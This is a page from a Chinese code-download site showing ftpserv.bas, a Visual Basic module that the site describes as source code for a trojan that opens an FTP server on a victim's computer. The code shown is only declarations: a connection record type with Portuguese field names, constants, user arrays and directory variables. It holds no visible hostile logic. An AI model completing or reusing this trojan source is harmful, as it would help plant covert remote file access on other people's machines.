⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 ftpserv.bas

📁 另一个可以在你的计算机上开FTP服务器的木马源代码
💻 BAS
字号:
Attribute VB_Name = "FTPSERV1"
Option Explicit

Type FTPConexao
   DiretorioCur As String
   TransferType As Integer
   PortaDados As Long
   DataAddress As String
   User As String
   Authenticated As Integer
End Type

Global Const TYPE_ASCII = 0
Global Const TYPE_BINARY = 1
Global Const USER_FORMATO = "!@@@@@@@@@@@@@@@"

Global Const MAX_USER = 100

Global gConexoes(1 To MAX_USER) As FTPConexao
Global logado(MAX_USER) As Boolean

Global cDiretorioFTP As String
Global cMascara As String

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -